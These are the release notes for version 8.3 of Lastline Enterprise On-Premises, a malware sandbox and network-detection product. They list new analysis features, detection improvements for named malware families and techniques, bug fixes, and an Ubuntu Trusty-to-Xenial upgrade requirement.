Lastline Enterprise On-Premises Release Notes

Version 8.3

New Features

  • Move analysis on mac-OS/Apple hardware from beta into GA
  • Extract URLs from executed scripts during sandbox analysis
  • Scan every stage of executed PowerShell script with YARA rules
  • Extract stages of Powershell script execution
  • New portal sitemap and navigation structure
  • Display new intrusion impact score
  • Support analysis of URLs that are rewritten by third party products in mail
  • New dynamic analysis framework for web attacks
  • Sniffing support for GRE encapsulation
  • Add new permissions for viewing and managing custom intelligence
  • Configure data-retention for analysis results
  • Support ICAP Blocking on sniffing events

MOVE ANALYSIS ON MAC-OS/APPLE HARDWARE FROM BETA INTO GA

The Lastline Manager now supports the deep dynamic analysis of applications on mac OS. This requires specific configuration of additional Engine appliances on Apple hardware, to adhere to Apple licensing restrictions.

This feature was previously available in beta only and is now marked generally-available.

This new feature was tracked internally as FEAT-3877

EXTRACT URLS FROM EXECUTED SCRIPTS DURING SANDBOX ANALYSIS

The sandbox performs a deeper analysis of the Microsoft PowerShell framework and extracts URLs from the executed scripts, even if the URLs were not used by the script to perform network activity.

This new feature was tracked internally as FEAT-3812

SCAN EVERY STAGE OF EXECUTED POWERSHELL SCRIPT WITH YARA RULES

The sandbox performs a deeper analysis of the Microsoft PowerShell framework and scans all stages of executed scripts with YARA signatures.

This new feature was tracked internally as FEAT-3759

EXTRACT STAGES OF POWERSHELL SCRIPT EXECUTION

The analysis sandbox now monitors more internals of the Microsoft Powershell framework. This allows extraction of all stages of the Powershell script, including packed or encrypted stages. The script code is used for more precise detection of anomalous behavior and is made available for download, just like files stored to disk.

This new feature was tracked internally as FEAT-3758

NEW PORTAL SITEMAP AND NAVIGATION STRUCTURE

The portal sitemap and navigation structure have been upgraded, resulting in improved workflows and user experience. Some highlights include:

  • Intrusions, Hosts, Events, Incidents, Downloads and Network Analysis sections are now found under the new Network tab
  • Appliances section is now found under the Admin tab
  • multiple new and updated navigation elements have been introduced
  • redirects have been implemented to preserve most existing direct links into the portal from notifications and otherwise.

This new feature was tracked internally as FEAT-3748

DISPLAY NEW INTRUSION IMPACT SCORE

A new impact score was introduced for intrusions. The score is now available for each intrusion under the Intrusions list and in the header of intrusion details page.

This new feature was tracked internally as FEAT-3593

SUPPORT ANALYSIS OF URLS THAT ARE REWRITTEN BY THIRD PARTY PRODUCTS IN MAIL

Certain mail security products have the capability to rewrite URLs identified in emails to perform the analysis of the URL whenever it is visited by the user. This URL rewriting would impact our sensor capability to perform analyses on the URL structure and make decisions on the maliciousness of the original URL. The sensor has now the capability to detect and correctly handle URL rewriting techniques applied by common vendors.

This new feature was tracked internally as FEAT-3570

NEW DYNAMIC ANALYSIS FRAMEWORK FOR WEB ATTACKS

This release adds a new dynamic analysis sandbox for detecting web-based attacks. The framework supports scanning URLs as well as file-based attacks, and it adds to the existing sandboxes used for scanning submissions. The new framework - improves extraction of Javascript executed by the browser, - extracts screenshots of visited web pages, and - allows significantly faster scanning of benign sites.

This new feature was tracked internally as FEAT-3398

SNIFFING SUPPORT FOR GRE ENCAPSULATION

The sensor now supports sniffing of traffic encapsulated using the GRE protocol.

This new feature was tracked internally as FEAT-3393

ADD NEW PERMISSIONS FOR VIEWING AND MANAGING CUSTOM INTELLIGENCE

This release introduces two new permissions related to customer-provided intelligence:

  • can_manage_custom_intel: Ability to manage custom intelligence entries (add, edit, delete)
  • can_view_custom_intel: Ability to get a listing of all custom threat intelligence entries and full information on individual entries

These permissions apply to all customer-provided intelligence that the product supports, such as custom IP and domain blacklists, custom IDS signatures, and custom NTA rules.

This new feature was tracked internally as FEAT-3211

CONFIGURE DATA-RETENTION FOR ANALYSIS RESULTS

The appliance configuration now allows marking analysis results for deletion after a configurable amount of time. This means that detailed analysis results, such as the sandbox report (or any metadata files, such as screenshots of network traffic captures) will not be available for download, allowing to limit the space used by these results on large installations.

This new feature was tracked internally as FEAT-2331

SUPPORT ICAP BLOCKING ON SNIFFING EVENTS

The sensor brings major architectural changes that affect both explicit proxy and ICAP operation.

The ICAP service on the sensor now acts upon blocking detections triggered by the sniffing component, allowing a sensor performing both ICAP blocking and sniffing to effectively block URLs that are associated to sniffing events.

When running the sensor in explicit proxy mode, the traffic flowing through the proxy is now fully inspected in search for suspicious network interactions, including C&C and drive-by events.

This new feature was tracked internally as FEAT-1284

Detection Improvements

  • TRES-330: Improved detection of command line arguments spoofing by malicious MS Office Macro.
  • TRES-291: Improve detection of PDF with embedded malicious URL in the Lastline document prefilter.
  • TRES-234: More robust extraction of malformed XML stream from Microsoft Office documents.
  • TRES-74: Improved detection of Cold River malware family.
  • MALS-2761: - MALS-2761 Better detection of suspicious web sites hosted on known-bad IPs.
  • FEAT-3927: - LLAM-3603: Improved handling of evasive/stalling code using operating system timers.
  • LLAM-2763: Improved handling of evasive/stalling code using operating system task scheduling.
  • LLAM-2402: Improved handling of evasive code fingerprinting operating system network configuration.
  • SIGLOGSCAN-195: Improved classification of suspicious memory allocations in Microsoft Office.
  • SIGLOGSCAN-336: Better detection of anomalous violations of Windows file and directory naming conventions.
  • LLAM-4396: Improved handling of Microsoft Office security warnings preventing execution of distrusted content.
  • LLAM-2577: Better user-emulation of Windows background processes.
  • LLAM-4358: Improved handling of Microsoft Office documents requiring specific user environment.
  • LLADOC-685: More robust classification of Microsoft Office macros with the ability to download files.
  • LLADOC-699: Improved detection of invoking shell commands from Microsoft Office macros.
  • SIGREPSCAN-571 LLADOC-652: Improved detection of exploits against Equation Editor.
  • SIGREPSCAN-566 SIGREPSCAN-562: Improved detection of using system utilities for downloading malware payload.
  • SIGREPSCAN-561: Improved detection of anomalous process restarts.
  • SIGREPSCAN-565: Improved detection of Vflooder Trojan.
  • SIGREPSCAN-553: Improved detection of online games password stealers.
  • SIGREPSCAN-557: Improved detection of credentials theft.
  • SIGLOGSCAN-347: Improved detection of CosmicDuke.
  • SIGLOGSCAN-342: Improved detection of Eldos RawDisk drivers.
  • SIGLOGSCAN-338: Improved detection of Carberp.

  • SIGLOGSCAN-339: Improved detection of CVE-2018-15982.

  • FEAT-3718: - LLADOC-566 Improved detection of the target OS for dynamic analysis of documents.

  • LLADOC-612 Improved detection of macros accessing Microsoft Outlook account data.
  • LLADOC-658 More robust extraction of document contents from very large documents.
  • LLADOC-668 LLADOC-670 LLADOC-672 LLADOC-674 Improved extraction of OLE data from Microsoft Office documents.
  • LLADOC-669 More robust parsing of object metadata from RTF documents.
  • LLADOC-673 More robust classification of executables embedded in Microsoft Office documents.
  • LLADOC-680 LLADOC-681 Improved extraction of Equation Editor Ole data from RTF documents.
  • LLAM-3441 Improved analysis of Microsoft Windows DLLs with non-default entrypoints.
  • LLAM-4056 Improved dynamic analysis of SettingContent-ms files.
  • MALS-2750 Improved dynamic analysis of MS Publisher documents.
  • SIGLOGSCAN-20 SIGLOGSCAN-21 SIGLOGSCAN-22 Improved detection of system fingerprinting for virtual environments.
  • SIGLOGSCAN-23 Improved detection of system fingerprinting for Winsock Packet Editor Pro.
  • SIGLOGSCAN-290 SIGLOGSCAN-329 Improved detection of shellcode.
  • SIGLOGSCAN-305 Improved detection of malware checking for the presence of a debugger.
  • SIGLOGSCAN-310 Improved detection of Mughthesec.
  • SIGLOGSCAN-326 Improved detection of PUA/Spigot.
  • SIGLOGSCAN-328 Improved detection of disabling kernel memory protection.
  • SIGLOGSCAN-330 Improved detection of PUA/InstallCore.
  • SIGLOGSCAN-331 Improved detection of Detecting PUA/Linkury.
  • SIGLOGSCAN-333 Improved detection scriptlet execution.
  • SIGREPSCAN-219 Improved detection of anomalous Powershell invocation.
  • SIGREPSCAN-230 Improved detection of banking trojans.
  • SIGREPSCAN-496 SIGREPSCAN-551 More robust classification of nested components in legitimate installer software.
  • SIGREPSCAN-520 Improved detection of malware fingerprinting browsers in headless mode.
  • SIGREPSCAN-546 More robust classification of code access IP addresses without prior DNS resolution.
  • SIGREPSCAN-6 SIGREPSCAN-545 Improved detection of modifying Windows autostart behavior.
  • FEAT-3622: - LLADOC-604 Improved extraction of OLE2.0 streams from Microsoft Office documents.
  • LLADOC-644 LLADOC-308 LLFILE-326 More robust detection of Microsoft Support Diagnostic cab files.
  • LLADOC-645 Improved extraction of zlib-compressed objects embedded in Microsoft Office documents.
  • LLADOC-650 Improved extraction of objects/metadata from RTF documents.
  • LLADOC-651 Improved extraction of email body text using RTF encoding.
  • LLADOC-653 More robust detection of embedded remote OLE objects in Microsoft Office documents.
  • LLADOC-661 LLADOC-662 Improved extraction of files embedded in Microsoft Office CDF documents.
  • SIGLOGSCAN-229 Improved detection of Turla Carbon.
  • SIGLOGSCAN-288 More robust detection of documents containing suspicious URLs.
  • SIGLOGSCAN-323 Improved detection of Mimikatz.
  • FEAT-3250: - FEAT-3250: Improved dynamic analysis and detection of ContentSetting-ms files.

Bug Fixes and Improvements

  • USER-3153: Metric graphs across the portal have been improved to show the maximum Y-axis value in the correct format.
  • SENT-1033: If a customer-defined IP whitelist is defined on the sensor (/etc/lastline/customer_whitelist_ips.txt) it will be consistently honored by all sniffing components on both involved endpoints. Previous releases incorrectly failed to apply the whitelist to clients involved in file uploads.
  • SENT-1030: Fixed a problem that causes the sensor to throw a warning message "service disabled but running" when the sensor lacks an Email Defender license.
  • SENT-1027: Fixed an ICAP bug that caused an unreasonable analysis load when processing HTTP POST requests.
  • PLTF-664: Fix bug that under certain circumstances could lead to license extensions not being propagated to the on-premises installation.
  • MALS-2803: More robust recovery after database failures while processing analysis submissions in the Lastline Analyst API.
  • MALS-2793: Improved documentation of mac OS sandbox report fields.
  • MALS-2739: Removed duplicate tags from analysis reports.
  • LLMAIL-480: Correctly report the number of delivery failure notifications generated by the sensor in the appliance monitoring pages.
  • LLFILE-435: Improved file type detection of ISO files
  • LLFILE-432: Improved file-type detection for password protected RAR5 files
  • LLFILE-431: More robust file-type detection for Microsoft Office CSV files
  • LLFILE-429: Improved file type classification for appx files.
  • LLADOC-682: More robust extraction of script attachments from email messages for subsequent dynamic analysis.
  • FEAT-3817: Improved extraction of document content from Microsoft Office CDF file types.
  • FEAT-3769: Improved extraction of document content from Microsoft Office OpenXML, XPS, and PDF file types.
  • FEAT-3768: Fix API performance issue that could cause display of intrusion details to be very slow for certain customers.
  • FEAT-3751: Display additional DNS response information in sandbox analysis reports.
  • FEAT-3737: Improved Analyst API documentation for handling of tar-gz archives and Microsoft Office document templates
  • FEAT-3712: Correctly report the real filename in the captured malware tab when a content disposition header is detected.
  • FEAT-3696: Propagate more malware network IOC information into the user portal
  • FEAT-3638: The New detections widget on the Overview dashboard has been improved to better communicate the unique nature and context of listed detections and to provide more supporting evidence. The widget now also displays the threat associated with each listed detection.
  • FEAT-3615: The utility for measuring the disk usage of analysis result files now allows printing the number of files on disk (in addition to the total space used). This supports re-configuring data-retention of disks containing an abundance of files.
  • FEAT-3569: The navigation header bar and main menu drawer have been modified to enable an improved user experience.
  • FEAT-3361: The intrusion details overview tab now includes an intrusion summary section.
  • FEAT-2706: Fixed an issue that could lead to the license being displayed as expired on its last valid day.

Deprecation of API methods

No additional API methods are being deprecated or discontinued in this release.

The Lastline API documentation includes a deprecation schedule for methods in the legacy API, as well as information on how to replace usage of these deprecated methods with supported methods.

Released appliance versions

As part of this release, we are making available the following versions of Lastline appliances for use with Lastline Enterprise On-Premises:

  • Lastline Manager version 1050
  • Lastline Engine version 1050
  • Lastline Sensor version 1052
  • Lastline All-in-one (Pinbox) version 1050

Released sandbox images versions

The sandbox images version was updated to 2018-12-31-01.

Distribution Upgrade

Version 8.3 will be the final version that supports Ubuntu Trusty as our operating system distribution. In all future releases, Ubuntu Xenial will be required. To support this distribution upgrade, version 8.3 will support both Ubuntu Trusty and Ubuntu Xenial. Before upgrading to any versions post-8.3, appliances on Ubuntu Trusty must be upgraded to Ubuntu Xenial while running version 8.3. Be prepared for this upgrade to take at least one hour. Additionally, this upgrade will require a reboot.

You can check the distribution in use by an appliance in the Appliance Status view of the portal. The "Base Distribution" listed should be "xenial". If it is "trusty", the appliance distribution should be upgraded.

For help on the upgrade process, please refer to the following instructions. This update is not done automatically to prevent unexpected downtime.

8.2 8.3.1